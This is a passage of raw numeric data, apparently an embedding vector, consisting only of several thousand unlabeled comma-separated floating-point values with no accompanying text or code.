-0.018520278856158257, -0.01008626725524664, 0.025970447808504105, -0.02268095687031746, -0.01625218242406845, -0.013856412842869759, -0.0016616430366411805, 0.0030566721688956022, 0.00036049203481525183, -0.01134047843515873, -0.030056023970246315, -0.01913611963391304, 0.015501158311963081, -0.030401496216654778, -0.009635651484131813, 0.031152520328760147, 0.016853002831339836, 0.011468153446912766, 0.016116999089717865, -0.0013706207973882556, -0.022410588338971138, -0.003407776355743408, 0.006511387415230274, -0.011280396953225136, 0.014990461058914661, 0.007840702310204506, 0.00242581102065742, 0.01399159710854292, 0.022635895758867264, -0.0034378173295408487, 0.008013437502086163, 0.015268339775502682, -0.006676612887531519, -0.026060570031404495, 0.008539155125617981, -0.00803596805781126, -0.0038940650410950184, 0.015155686065554619, -0.01885072886943817, -0.01250456739217043, 0.01221917849034071, -0.015043032355606556, 0.012880080379545689, -0.019751960411667824, -0.0146299684420228, 0.008892136625945568, -0.003676267806440592, 0.01435959991067648, -0.029289977625012398, 0.0018212358700111508, 0.025955427438020706, -0.0038245953619480133, 0.0008491277694702148, 0.0016898064641281962, 0.017318638041615486, 0.016853002831339836, 0.00919254682958126, -0.015426055528223515, -0.0019808285869657993, 0.020833436399698257, -0.01203142199665308, -0.009049852378666401, -0.0016729084309190512, -0.001397845451720059, -0.009988633915781975, 0.009635651484131813, -0.0029083446133881807, -0.008306337520480156, 0.027667764574289322, 0.012947672978043556, 0.0006285140989348292, -0.02156944014132023, -0.03983436897397041, 0.004337169695645571, 0.01055190246552229, -0.003758880542591214, 0.014652499929070473, 0.0056026470847427845, -0.008163643069565296, 0.023552147671580315, -0.01569642499089241, 0.01598181389272213, -0.0283436868339777, 0.00047384988283738494, 0.00017766437667887658, 0.026180734857916832, 0.011746032163500786, 0.0018953995313495398, -0.01970689930021763, 0.0022962591610848904, 0.019902164116501808, 0.00924511905759573, 0.002324422588571906, 0.012812487781047821, -0.0037213293835520744, -0.0009176587918773293, 0.019721919670701027, 0.020833436399698257, -0.018174806609749794, 0.010784720070660114, -0.003916596062481403, 0.03601916506886482, -0.004416027572005987, -0.021869851276278496, -0.009718264453113079, -0.012714854441583157, -0.008719401434063911, 0.005317257717251778, 0.032654572278261185, -0.03661998361349106, -0.017528925091028214, 0.013946535997092724, 0.009260139428079128, 0.018700525164604187, -0.02352210506796837, -0.014569886960089207, -0.01551617868244648, 0.0014307027449831367, 0.017063289880752563, -0.018249910324811935, 0.002001481829211116, 0.026691431179642677, 0.02358218841254711, 0.01680794171988964, 0.02072829194366932, -0.01189623773097992, -0.027172088623046875, -0.010964966379106045, 0.00974830612540245, -0.043889906257390976, -0.01468254067003727, -0.01467503048479557, 0.035448383539915085, 0.05001826956868172, -0.004945500288158655, -0.00193952233530581, 0.001691684010438621, -0.002744996687397361, -0.011685950681567192, -0.024468397721648216, 0.004404762294143438, 0.029500264674425125, 0.0020484209526330233, -0.0024145457427948713, 0.03616936877369881, -0.006766736041754484, 0.016417408362030983, 0.006706654094159603, -0.008824544958770275, -0.011235334910452366, 0.0399545356631279, -0.0204429030418396, 0.00956805981695652, -0.02379247546195984, -0.020127471536397934, 0.012241709046065807, -0.02165956422686577, 0.036740146577358246, -0.014509804546833038, 0.014472253620624542, 0.04079568386077881, -0.04656355455517769, 0.021223969757556915, -0.005489993374794722, 0.009650672785937786, 0.013405798003077507, -0.008073519915342331, -0.03604920580983162, -0.016943126916885376, 0.008674339391291142, 0.01607193611562252, -0.00923760887235403, 0.01877562701702118, -0.027202129364013672, -0.034877605736255646, 0.00938781350851059, -0.013946535997092724, 0.010934925638139248, 0.03616936877369881, -0.017979539930820465, 0.012850039638578892, 0.019076038151979446, 0.03133276849985123, -0.02888442575931549, -0.0060720378533005714, -0.025384647771716118, 0.03019120916724205, 0.01216660626232624, -0.021043723449110985, 0.013871433213353157, 0.020983640104532242, 0.02841878868639469, -0.004889173433184624, -0.006327386479824781, -0.003924106247723103, -0.02053302526473999, 0.006391223520040512, -0.021419236436486244, -0.017528925091028214, -0.009680713526904583, -0.009462916292250156, -0.037220802158117294, -0.02162952348589897, 0.00652640825137496, -0.018625421449542046, 0.012985223904252052, -0.017033249139785767, 0.009072382934391499, 0.008501604199409485, -0.010589453391730785, 0.000921413884498179, 0.012249219231307507, -0.004731458146125078, -0.011505704373121262, -0.021254010498523712, 0.01868550479412079, -0.04205740615725517, 0.015816587954759598, 0.0025591179728507996, 0.008328868076205254, 0.007566577754914761, -0.03148297220468521, 0.0039954534731805325, -0.00193952233530581, 0.023176634684205055, -0.0026379756163805723, -0.012099014595150948, 0.006571469362825155, -0.01607193611562252, 0.01691308431327343, 0.014081720262765884, 0.004468599334359169, -0.023717371746897697, -0.005001827143132687, -0.019766980782151222, 0.005493748467415571, 0.014149312861263752, 0.03908334672451019, 0.0067366948351264, 0.00140535575337708, 0.014449723064899445, -0.0020953600760549307, 0.016492510214447975, -0.015028011985123158, -0.01072463858872652, 0.004622559528797865, -0.03568871319293976, -0.005264685954898596, 0.01156578678637743, 0.005275951232761145, 0.009770836681127548, 0.011100150644779205, 0.014599927701056004, -0.004885418340563774, 0.013022774830460548, -0.011490684002637863, -0.00460002850741148, -0.0029383855871856213, -0.024663664400577545, 0.007397597189992666, 0.0024746276903897524, -0.0002950120542664081, -0.0032500610686838627, 0.00923760887235403, 0.005272196140140295, -0.001624091761186719, -0.007213595788925886, 0.01940648816525936, 0.02144927717745304, 0.006203467026352882, -0.0040142289362847805, -0.006687878631055355, -0.0045437016524374485, 0.021794747561216354, 0.011776073835790157, -0.03911338746547699, 0.017799295485019684, -0.022425608709454536, -0.013691187836229801, -0.005568851251155138, -0.015531199052929878, 0.023371901363134384, 0.02416798658668995, 0.018144765868782997, 0.0018700524233281612, 0.001975195948034525, -0.0008899647509679198, 0.014179353602230549, 0.005448686890304089, -0.003015365684404969, -0.027337312698364258, -0.0008120458805933595, 0.0032782244961708784, -0.025685058906674385, -0.02062314935028553, 0.0011302927741780877, 0.014427191577851772, 0.021854830905795097, -0.02153939940035343, -0.01449478417634964, -0.016297243535518646, -0.014036659151315689, -0.000931271119043231, -0.013323185034096241, 0.008464052341878414, -0.014119272120296955, -0.021238990128040314, 0.017153413966298103, 0.00724363699555397, -0.0005980037385597825, -0.0204429030418396, -0.007810661103576422, -0.018039623275399208, 0.0334656797349453, 0.002699935110285878, -0.02897454798221588, 0.024183008819818497, 0.0031524277292191982, -0.005640198476612568, 0.03986441344022751, -0.019166160374879837, 0.00006835501699242741, 0.03166321665048599, -0.016702797263860703, -0.007412617560476065, 0.006909430958330631, 0.02072829194366932, -0.020037349313497543, 0.0023225450422614813, 0.015591280534863472, -0.013743759132921696, -0.0010458024917170405, -0.002754384418949485, 0.02723217010498047, -0.02685665711760521, 0.008944708853960037, 0.0026285878848284483, 0.007735558319836855, -0.012331832200288773, -0.007397597189992666, -0.024137945845723152, -0.013893963769078255, 0.012346852570772171, -0.01970689930021763, 0.004802805371582508, 0.0015095603885129094, -0.011993871070444584, 0.020863477140665054, 0.004697661846876144, -0.004554967395961285, 0.024483418092131615, -0.009462916292250156, 0.03133276849985123, -0.002940263133496046, -0.037130679935216904, -0.013608574867248535, -0.009252629242837429, -0.003146795090287924, 0.0015396014787256718, -0.009643162600696087, 0.04070556163787842, 0.0158015675842762, -0.001056128996424377, 0.022741040214896202, -0.00971075426787138, -0.021524379029870033, -0.04001461714506149, 0.01912109926342964, -0.018279951065778732, 0.02454349957406521, 0.012662283144891262, -0.0020202575251460075, 0.0025159339420497417, 0.007698007393628359, -0.005290971603244543, -0.0011443744879215956, -0.0043296595104038715, 0.010739658959209919, -0.009117444977164268, 0.0015799690736457705, 0.014457233250141144, 0.002324422588571906, -0.006804287433624268, 0.016853002831339836, -0.005482483189553022, 0.01134047843515873, -0.018084684386849403, -0.001508621615357697, -0.03178338333964348, 0.0007097187335602939, 0.00749898562207818, -0.012624732218682766, 0.006931961514055729, -0.015110624954104424, 0.005865505896508694, 0.019902164116501808, 0.0072323717176914215, 0.03214387223124504, 0.02583526261150837, -0.031272683292627335, 0.0067028990015387535, 0.016792921349406242, -0.007870743051171303, 0.0007425760850310326, -0.020112451165914536, 0.0048178257420659065, 0.03830228000879288, 0.0334656797349453, -0.01847521774470806, 0.039533961564302444, -0.022605855017900467, -0.007705517578870058, -0.03259448707103729, 0.0017123372526839375, -0.015125645324587822, 0.0073638008907437325, 0.009545529261231422, -0.002504668664187193, -0.013556002639234066, 0.017063289880752563, -0.004592518322169781, -0.006225998047739267, -0.015456096269190311, -0.011648398824036121, -0.024483418092131615, 0.007375066168606281, 0.01931636594235897, 0.01840011402964592, 0.018460197374224663, -0.008073519915342331, -0.0167178176343441, -0.018805667757987976, 0.04431048035621643, 0.007048370316624641, -0.0011321703204885125, 0.0005388605059124529, 0.020788375288248062, -0.017063289880752563, -0.019586734473705292, 0.008366419933736324, 0.00821621436625719, -0.011595827527344227, -0.0032613263465464115, -0.008163643069565296, -0.034607235342264175, 0.006751715671271086, 0.0171834547072649, 0.005058153998106718, 0.006913186050951481, -0.00012978652375750244, -0.021494338288903236, 0.010266512632369995, 0.0004358292499091476, 0.00938030332326889, -0.0047577437944710255, -0.013293144293129444, -0.007266167551279068, -0.015170706436038017, -0.0006590245175175369, 0.015501158311963081, -0.0025328320916742086, -0.005257175769656897, -0.001845644204877317, 0.02379247546195984, -0.022155240178108215, -0.016837982460856438, 0.018039623275399208, -0.01700320839881897, -0.003965412266552448, -0.002964671468362212, -0.007855722680687904, 0.00041634953231550753, -0.009635651484131813, -0.004645090084522963, 0.0148702971637249, 0.019436528906226158, 0.010439248755574226, -0.0019198078662157059, 0.023567168042063713, 0.001075843465514481, 0.03382616862654686, 0.0047577437944710255, -0.010829782113432884, -0.019556693732738495, 0.01913611963391304, 0.01885072886943817, 0.03409653902053833, 0.01775423251092434, 0.015411035157740116, -0.006079548038542271, 0.007164779584854841, -0.003308265469968319, -0.001610010047443211, 0.004198230337351561, 0.023852556943893433, -0.004160678945481777, 0.023371901363134384, 0.007480209693312645, -0.006868124473839998, -0.002632342977449298, -0.007213595788925886, 0.007863232865929604, 0.0005599830765277147, -0.014427191577851772, -0.008892136625945568, 0.0025478526949882507, 0.00891466811299324, -0.009372793138027191, -0.009778346866369247, 0.02999594248831272, 0.022245362401008606, 0.022500712424516678, 0.009785857051610947, 0.008794504217803478, -0.015073074027895927, -0.0052872165106236935, 0.0024239334743469954, -0.022260382771492004, -0.016237162053585052, 0.01709333062171936, 0.00445733405649662, 0.015576260164380074, -0.02451345883309841, 0.010559412650763988, -0.01250456739217043, -0.021163886412978172, -0.004431047942489386, 0.0040367599576711655, -0.013180490583181381, 0.007562822662293911, -0.004476109519600868, 0.02230544574558735, 0.0074464138597249985, -0.009275159798562527, -0.004645090084522963, -0.016192100942134857, 0.008156132884323597, 0.015343442559242249, 0.017123371362686157, -0.007750579155981541, -0.0007730864454060793, 0.014111761003732681, 0.018355052918195724, -0.022650916129350662, -0.0023094022180885077, -0.021809767931699753, 0.010596963576972485, 0.0032857346814125776, 0.0025497302412986755, 0.01007124688476324, -0.016747860237956047, -0.007296208757907152, 0.00920005701482296, -0.007393842097371817, 0.010326595045626163, -0.005080684553831816, 0.0032143874559551477, -0.02388259768486023, 0.014276986941695213, 0.008539155125617981, 0.005309747532010078, -0.020683230832219124, 0.0035955326166003942, 0.00044427826651372015, -0.01086733303964138, -0.005651463754475117, 0.008486583828926086, 0.024273131042718887, 0.0034885115455836058, -0.027757886797189713, -0.012346852570772171, -0.01698818802833557, -0.02144927717745304, -0.002570383483543992, 0.018535299226641655, 0.005734076723456383, 0.0055838716216385365, -0.0033814904745668173, 0.009342752397060394, 0.021809767931699753, -0.009613120928406715, 0.012482036836445332, 0.005955629050731659, -0.013398287817835808, -0.011858685873448849, -0.006394978612661362, 0.0035335731226950884, 0.014201884157955647, 0.0005552891525439918, 0.0004250332713127136, 0.018700525164604187, -0.009102423675358295, 0.00633865175768733, -0.0024295661132782698, -0.01134047843515873, 0.00503937853500247, 0.00826878659427166, -0.0071084522642195225, 0.008689360693097115, -0.013811351731419563, 0.0016428673407062888, -0.008771972730755806, 0.010319084860384464, 0.01482523512095213, -0.011595827527344227, -0.0034058988094329834, 0.031813424080610275, 0.0035936550702899694, -0.017513904720544815, 0.03337555378675461, 0.005260930862277746, 0.00027905276510864496, -0.008501604199409485, -0.02155441977083683, -0.006582735106348991, 0.027382375672459602, -0.005399870220571756, -0.015501158311963081, -0.005873016081750393, -0.014367110095918179, 0.003897820133715868, 0.016837982460856438, 0.013856412842869759, -0.002701812656596303, -0.010762189514935017, -0.0013349470682442188, 0.01482523512095213, -0.010566922836005688, -0.01165590900927782, -0.03241424262523651, -0.010837292298674583, 0.006928206421434879, -0.007258657366037369, 0.006905675865709782, 0.0028163441456854343, 0.000056561577366665006, -0.003710063872858882, 0.00855417549610138, -0.009447895921766758, -0.007930824533104897, 0.0181147251278162, -0.004889173433184624, 0.019196201115846634, -0.008636788465082645, 0.0014504172140732408, 0.0079007837921381, 0.02302642911672592, 0.0002383331157034263, -0.00892217829823494, -0.00011060018005082384, -0.015343442559242249, 0.006860614288598299, -0.006379958242177963, -0.010837292298674583, -0.0005214930279180408, 0.0012908243807032704, 0.020743312314152718, -0.004911703988909721, -0.013683676719665527, 0.012159096077084541, -0.01100251730531454, -0.020938578993082047, -0.003871534252539277, 0.0013997229980304837, -0.0018465829780325294, 0.018445177003741264, 0.024919012561440468, 0.027367353439331055, -0.018640441820025444, 0.005925587844103575, -0.003255693707615137, 0.008096050471067429, 0.012114034965634346, -0.0236873310059309, 0.008651808835566044, 0.005974404513835907, 0.0190610159188509, 0.002249320037662983, -0.003939126618206501, -0.019030975177884102, 0.008186173625290394, -0.00020711863180622458, -0.017889417707920074, 0.024213049560785294, 0.010784720070660114, 0.006762980949133635, -0.004847866948693991, 0.01333820540457964, 0.002504668664187193, -0.008073519915342331, -0.0125346090644598, 0.0002933691721409559, -0.0024126681964844465, -0.00008184999751392752, -0.01635732688009739, 0.0030285087414085865, -0.014427191577851772, -0.0028614054899662733, -0.012902610935270786, 0.0003581451019272208, -0.013157960027456284, 0.02211017906665802, 0.007656700909137726, 0.0035561039112508297, -0.009372793138027191, -0.013458369299769402, 0.0029609163757413626, -0.006811797618865967, -0.003976678010076284, -0.003402143716812134, -0.0008524134755134583, -0.029094712808728218, -0.005752852186560631, 0.0023638515267521143, -0.007408862467855215, 0.008929688483476639, -0.00019421039905864745, 0.0055838716216385365, 0.011535745114088058, -0.0034828789066523314, 0.009342752397060394, -0.011423091404139996, 0.028659118339419365, -0.0020803394727408886, 0.020397841930389404, 0.0009613120928406715, 0.00492296926677227, 0.013871433213353157, 0.02675151452422142, -0.008141111582517624, -0.014209394343197346, 0.0014288251986727118, -0.003649981925264001, -0.004243291914463043, 0.017528925091028214, -0.0022774836979806423, 0.009342752397060394, 0.029485244303941727, -0.012429465539753437, -0.006353672128170729, 0.0039466368034482, -0.014231925830245018, -0.0056852600537240505, 0.0019470325205475092, -0.0019789510406553745, 0.004374721087515354, 0.03634961321949959, 0.016672756522893906, 0.010882353410124779, 0.002153564477339387, -0.000025772482331376523, 0.018325012177228928, 0.02304144948720932, -0.00803596805781126, -0.005065664183348417, -0.012789957225322723, 0.03298502042889595, -0.007269923109561205, 0.02535460703074932, 0.0035598590038716793, -0.0007937396294437349, 0.005565095692873001, -0.017033249139785767, -0.01653757318854332, -0.018700525164604187, -0.005324767902493477, -0.00281071150675416, -0.007743068505078554, 0.0031505501829087734, 0.008186173625290394, 0.015741486102342606, -0.0001283783494727686, 0.012992734089493752, -0.010499331168830395, 0.016762880608439445, -0.024137945845723152, 0.01644744910299778, 0.01858036033809185, -0.004554967395961285, 0.00854666531085968, 0.0062673045322299, 0.0018353175837546587, -0.003980433102697134, -0.0056026470847427845, 0.002654873766005039, -0.008832055144011974, -0.02416798658668995, 0.020938578993082047, 0.020412862300872803, -0.005737831816077232, -0.002247442491352558, -0.011363009922206402, 0.01007124688476324, -0.006117099430412054, 0.0025234443601220846, 0.008884626440703869, 0.020683230832219124, -0.00724739208817482, 0.0053285229951143265, -0.004348435439169407, 0.008884626440703869, -0.012917631305754185, -0.007480209693312645, -0.009492957033216953, 0.003835860639810562, -0.008449031971395016, -0.0018700524233281612, -0.004051780328154564, 0.017348678782582283, 0.004051780328154564, -0.0079007837921381, 0.0007341270102187991, -0.030416516587138176, -0.0012213545851409435, -0.0012626609532162547, 0.009132465347647667, -0.008186173625290394, -0.01775423251092434, -0.01184366550296545, -0.008238744921982288, -0.002435198752209544, 0.009665693156421185, 0.02648114413022995, 0.004194475244730711, -0.006301100365817547, -0.0043521905317902565, 0.017063289880752563, 0.003845248371362686, -0.026706451550126076, 0.0043108840472996235, -0.002339443191885948, -0.01315044891089201, -0.014089230448007584, 0.01886575110256672, 0.014569886960089207, 0.0029440184589475393, 0.017213495448231697, -0.0008388011483475566, -0.004829091485589743, 0.0008331684512086213, 0.0031749585177749395, 0.007566577754914761, -0.013548492453992367, 0.0031918566673994064, 0.005888036917895079, 0.005632688291370869, -0.008291317149996758, 0.00692445132881403, 0.01691308431327343, -0.016312265768647194, -0.0017264189664274454, 0.0056852600537240505, -0.009139975532889366, -0.025970447808504105, -0.011498194187879562, 0.007052125409245491, -0.023086510598659515, -0.0030003453139215708, -0.009417854249477386, -0.0009171894052997231, -0.01528336014598608, -0.003280102042481303, 0.008892136625945568, 0.0026792821008712053, -0.011272886767983437, -0.02841878868639469, 0.009395323693752289, -0.0190459955483675, 0.0069582476280629635, 0.020518004894256592, 0.021043723449110985, -0.009260139428079128, 0.0022174015175551176, -0.02099866233766079, 0.0025872814003378153, -0.0021404214203357697, 0.002151686931028962, -0.019030975177884102, 0.02583526261150837, -0.014111761003732681, 0.0004675131058320403, -0.011430601589381695, 0.013578533194959164, 0.013954046182334423, 0.006470080930739641, 0.01301526464521885, -0.009019811637699604, 0.0037570029962807894, -0.004772764630615711, -0.006026976276189089, 0.01589169166982174, -0.012632242403924465, -0.014464743435382843, 0.004551211837679148, -0.004791540093719959, -0.0031054888386279345, 0.01596679352223873, 0.003826472908258438, -0.016417408362030983, 0.0066841235384345055, 0.0018465829780325294, -0.037581294775009155, 0.006548938807100058, -0.005734076723456383, -0.003128019394353032, 0.0062748147174716, -0.01886575110256672, 0.007213595788925886, -0.0014738867757841945, 0.01351094152778387, 0.036740146577358246, 0.022440629079937935, -0.007378821726888418, -0.0029008344281464815, -0.002947773551568389, -0.0031655707862228155, -0.0059593841433525085, 0.009132465347647667, 0.0181297454982996, 0.009185036644339561, -0.0028426300268620253, 0.017769252881407738, 0.002341320738196373, -0.006826817989349365, 0.000321297935442999, 0.018144765868782997, 0.008606747724115849, 0.01829497143626213, 0.007450168952345848, -0.001183803309686482, -0.01571144536137581, 0.007878253236413002, -0.020938578993082047, 0.013495921157300472, -0.011926278471946716, -0.004776519723236561, 0.00011799308413174003, 0.010176390409469604, -0.03178338333964348, 0.0014551110798493028, -0.010116307996213436, 0.007630414795130491, 0.016582634299993515, -0.008456542156636715, -0.01894085295498371, 0.003146795090287924, -0.0027036904357373714, -0.013803841546177864, -0.005137011408805847, 0.0051557873375713825, -0.022440629079937935, 0.004509905818849802, -0.013676166534423828, -0.008794504217803478, -0.00009399548434885219, -0.008674339391291142, 0.01847521774470806, -0.009545529261231422, 0.0013940903590992093, -0.028013234958052635, -0.0068756346590816975, -0.008464052341878414, -0.010011164471507072, -0.005298481788486242, -0.007040860131382942, -0.016868023201823235, -0.008907157927751541, 0.001123721245676279, -0.03595907986164093, -0.007698007393628359, -0.019751960411667824, -0.0025685057044029236, -0.016477489843964577, 0.0003156652383040637, 0.0026229550130665302, 0.011505704373121262, -0.01664271578192711, -0.003991698380559683, 0.023281777277588844, 0.02014249376952648, 0.01764908991754055, -0.006672857794910669, -0.0013311919756233692, 0.0010655168443918228, 0.011302927508950233, -0.018084684386849403, -0.012789957225322723, 0.010506841354072094, -0.013939025811851025, 0.00028304258012212813, -0.007908293977379799, 0.006417509168386459, -0.011175253428518772, 0.004333414603024721, -0.01885072886943817, 0.024964073672890663, 0.003691288409754634, 0.010334105230867863, -0.03121260367333889, 0.0021347887814044952, -0.0030792029574513435, -0.02907969243824482, -0.0003151958517264575, 0.005797913763672113, 0.0007022084319032729, 0.004825336392968893, -0.021058743819594383, -0.008013437502086163, 0.003828350454568863, -0.016207121312618256, 0.007878253236413002, -0.0025760161224752665, -0.00076041289139539, -0.01134047843515873, 0.014442212879657745, -0.0033007552847266197, -0.0045324363745749, -0.009628141298890114, -0.012977713719010353, 0.0007059635827317834, 0.00034523685462772846, -0.005046888720244169, 0.00029853248270228505, 0.017513904720544815, -0.017874397337436676, -0.0029627939220517874, 0.00957557000219822, 0.01091990526765585, -0.015831608325242996, 0.011310437694191933, 0.0069357166066765785, -0.0027562621980905533, -0.020232615992426872, 0.025414688512682915, -0.0008777605835348368, 0.010131328366696835, -0.02323671616613865, -0.003143039997667074, 0.0001714449463179335, -0.005193338729441166, -0.009275159798562527, -0.0024107906501740217, -0.01068708673119545, -0.0006491673411801457, 0.0014860909432172775, -0.012962693348526955, 0.007480209693312645, -0.008666829206049442, 0.013736248947679996, 0.01398408692330122, -0.013593554496765137, 0.004660110455006361, 0.0020803394727408886, 0.0055425651371479034, -0.00011453132901806384, 0.009966103360056877, 0.007262412458658218, -0.0029383855871856213, -0.013210531324148178, 0.009215078316628933, -0.00003476424899417907, 0.01969187706708908, -0.005880526266992092, -0.008201193995773792, 0.006676612887531519, 0.030972274020314217, 0.006781756412237883, 0.019466569647192955, -0.026270857080817223, -0.01431453786790371, 0.01366114616394043, 0.015118135139346123, 0.007990906946361065, -0.018054643645882607, 0.0020822170190513134, -0.010506841354072094, 0.009267649613320827, -0.027607683092355728, 0.0019958491902798414, 0.005309747532010078, 0.006676612887531519, 0.004217005800455809, -0.010491820052266121, 0.012391913682222366, -0.010476799681782722, 0.008238744921982288, 0.011678440496325493, 0.014750132337212563, -0.008539155125617981, 0.0009800877887755632, -0.0033533270470798016, 0.0064475503750145435, -0.009763326495885849, -0.015951773151755333, 0.012264239601790905, 0.006135874893516302, -0.015456096269190311, -0.006102079059928656, 0.004618804436177015, -0.01940648816525936, 0.00478402990847826, 0.011265376582741737, 0.01287257019430399, 0.002444586716592312, 0.02490399219095707, 0.014847765676677227, -0.013248082250356674, -0.0035298180300742388, 0.004491129890084267, 0.008937198668718338, -0.010754679329693317, 0.006443795282393694, -0.01170848123729229, 0.012850039638578892, -0.003871534252539277, 0.011430601589381695, -0.01625218242406845, -0.011550765484571457, 0.022996388375759125, 0.002275605918839574, 0.014254456385970116, 0.013766289688646793, 0.001302089774981141, 0.014472253620624542, 0.0008298827451653779, -0.010461779311299324, -0.004588763229548931, -0.006379958242177963, -0.0031374073587358, -0.018039623275399208, 0.005009337328374386, -0.008659319020807743, -0.014329559169709682, -0.024498438462615013, -0.021223969757556915, -0.006984533276408911, 0.0031505501829087734, -0.0011030681198462844, 0.010499331168830395, -0.002042788313701749, -0.0034734909422695637, 0.01003369502723217, -0.0069770230911672115, 0.015320912003517151, -0.014464743435382843, -0.029515286907553673, 0.016958147287368774, -0.007833192124962807, -0.015906712040305138, 0.01664271578192711, -0.027532579377293587, -0.01152072474360466, -0.00743514858186245, 0.0009364344296045601, -0.009215078316628933, -0.010491820052266121, -0.01236187294125557, -0.005527544766664505, 0.00841148104518652, -0.01496041938662529, 0.01710835099220276, -0.01067957654595375, 0.01157329697161913, -0.013255592435598373, -0.0023206674959510565, 0.018430156633257866, -0.03490764647722244, 0.005749097093939781, -0.0010523739038035274, -0.02816344052553177, -0.009102423675358295, 0.013803841546177864, 0.002596669364720583, -0.019661836326122284, 0.020367801189422607, 0.006316121201962233, 0.019827062264084816, -0.0068944101221859455, -0.013458369299769402, -0.013240572065114975, 0.000551064673345536, -0.023191655054688454, 0.001982706133276224, -0.019932206720113754, 0.002035277895629406, -0.000014822477169218473, 0.0033176534343510866, 0.01072463858872652, -0.0077205379493534565, 0.01040920801460743, -0.00698828836902976, -0.010424228385090828, -0.026135673746466637, 0.010341615416109562, 0.005936853121966124, 0.01365363597869873, 0.010153858922421932, -0.016237162053585052, -0.016372347250580788, -0.019106078892946243, -0.023356880992650986, -0.003659369656816125, -0.005046888720244169, -0.0014307027449831367, -0.014224415645003319, -0.010506841354072094, 0.004487374797463417, 0.003111121477559209, -0.016086958348751068, 0.02053302526473999, 0.008141111582517624, -0.022635895758867264, -0.00034594093449413776, -0.003206877037882805, 0.0028839362785220146, -0.0068944101221859455, 0.009778346866369247, -0.016417408362030983, 0.011257866397500038, -0.015215768478810787, 0.0037232069298624992, 0.006256038788706064, 0.004190720152109861, -0.01301526464521885, -0.008764462545514107, 0.004517416004091501, 0.0009448834462091327, -0.012249219231307507, -0.006931961514055729, 0.0043108840472996235, 0.018279951065778732, -0.010611984878778458, 0.0040968419052660465, 0.0019076036987826228, 0.011618358083069324, -0.0055613406002521515, 0.005587626714259386, -0.004742723423987627, -0.006259794346988201, 0.019646815955638885, 0.01746884360909462, 0.015531199052929878, 0.006128364708274603, -0.005407380871474743, 0.003392755752429366, 0.031633175909519196, -0.009049852378666401, -0.007682986557483673, 0.010604474693536758, 0.0003337367670610547, -0.0064287749119102955, 0.011948809027671814, -0.01532842218875885, 0.007728048134595156, 0.02786303125321865, -0.00087353604612872, -0.012384403496980667, -0.029004588723182678, -0.00536231929436326, 0.004652600269764662, 0.013999107293784618, 0.003084835596382618, -0.016402387991547585, -0.006826817989349365, 0.0008280051406472921, 0.002690547378733754, 0.003308265469968319, -0.0037739011459052563, 0.000006450454748119228, -0.0010777210118249059, 0.015936752781271935, -0.007468944415450096, 0.006965757813304663, 0.009124955162405968, 0.020202575251460075, 0.011347989551723003, -0.00749898562207818, -0.006379958242177963, 0.0030754476319998503, -0.0006050445954315364, 0.003118631662800908, -0.012797467410564423, -0.03268461301922798, -0.009492957033216953, 0.0213741734623909, -0.018159786239266396, 0.01820484735071659, 0.004558722488582134, 0.006856859195977449, -0.020037349313497543, 0.015253319405019283, 0.010296554304659367, 0.0018127867951989174, -0.0037025536876171827, -0.006586490198969841, 0.014990461058914661, 0.001270171138457954, 0.009079893119633198, -0.011272886767983437, -0.006676612887531519, 0.009583080187439919, -0.015726465731859207, 0.019751960411667824, -0.02424309030175209, 0.011393050663173199, 0.011205294169485569, 0.01689806394279003, 0.0039466368034482, 0.015215768478810787, -0.007408862467855215, -0.009365282952785492, -0.007592863868921995, 0.013135428540408611, -0.013571023009717464, 0.0006238202331587672, -0.011490684002637863, -0.02517436072230339, -0.006886899936944246, -0.011821134947240353, -0.019091058522462845, 0.018445177003741264, 0.0035185525193810463, 0.00129457947332412, -0.004633824806660414, 0.0014138047117739916, 0.010476799681782722, 0.013878943398594856, -0.008381440304219723, -0.00041142094414681196, 0.005185828078538179, 0.003308265469968319, -0.000868842180352658, -0.0036819004453718662, 0.024753786623477936, 0.019106078892946243, -0.015088094398379326, -0.010198920965194702, 0.00235821888782084, 0.00034594093449413776, -0.01885072886943817, 0.011648398824036121, 0.025895345956087112, -0.01569642499089241, -0.02497909404337406, 0.0031674483325332403, 0.013954046182334423, 0.005993180442601442, -0.0026943024713546038, 0.02981569617986679, -0.005223379470407963, 0.0006116160657256842, 0.015441075898706913, 0.0102214515209198, -0.009936061687767506, -0.007848212495446205, -0.003270714310929179, 0.0102214515209198, -0.0006679429206997156, -0.02090853825211525, 0.005152032244950533, -0.04848618060350418, -0.02386757731437683, -0.019181180745363235, 0.02769780531525612, 0.005884281359612942, 0.001465437700971961, -0.005257175769656897, -0.013954046182334423, -0.010431738570332527, 0.00002420295641059056, -0.009598100557923317, 0.007645435631275177, 0.00910993479192257, -0.021434256806969643, 0.015831608325242996, -0.02311655320227146, 0.0035598590038716793, 0.02574514038860798, -0.024017782881855965, -0.00304165156558156, -0.013548492453992367, 0.03704055771231651, 0.00640999898314476, 0.01430702768266201, 0.017634069547057152, 0.01784435659646988, 0.009763326495885849, -0.0195116326212883, 0.02108878456056118, 0.007461434230208397, -0.00835890881717205, 0.013668656349182129, -0.024828890338540077, 0.021614501252770424, -0.00258915894664824, -0.01728859730064869, 0.02553485333919525, 0.015591280534863472, -0.013751269318163395, 0.0006379019469022751, 0.006838083267211914, 0.02155441977083683, -0.020923558622598648, 0.011468153446912766, 0.023627249523997307, -0.0004557783540803939, 0.0021554420236498117, -0.012955183163285255, 0.012053952552378178, -0.01468254067003727, -0.015350952744483948, -0.006023221183568239, -0.01727357693016529, -0.0011969462502747774, -0.005268441047519445, -0.013030285015702248, -0.01607193611562252, 0.004340925253927708, -0.01402163878083229, 0.015103114768862724, 0.004002963658422232, -0.0260305292904377, 0.016657736152410507, -0.017318638041615486, 0.017063289880752563, 0.01053688209503889, 0.018715545535087585, 0.01607193611562252, 0.021344132721424103, 0.00255536288022995, 0.00699579855427146, -0.014156823046505451, 0.004806560464203358, -0.0033101430162787437, -0.018610401079058647, -0.017048269510269165, -0.004382231272757053, -0.011430601589381695, -0.001222293358296156, -0.006064527668058872, 0.01746884360909462, -0.0007524332613684237, -0.028929486870765686, -0.026886697858572006, 0.02229042537510395, 0.006657837424427271, 0.004761498887091875, -0.015681404620409012, -0.01300775445997715, 0.006503877229988575, 0.005441176705062389, -0.0039015754591673613, -0.02229042537510395, -0.0063048554584383965, -0.009312710724771023, -0.011866196058690548, 0.0021479318384081125, -0.0031411624513566494, -0.002117890864610672, -0.0033777353819459677, 0.010529371909797192, -0.007115962915122509, 0.010559412650763988, 0.00006278100045165047, -0.025309545919299126, 0.00886960607022047, -0.018715545535087585, -0.012707344256341457, -0.02341696247458458, 0.010026184841990471, -0.006578980013728142, -0.011325458064675331, 0.014374620281159878, 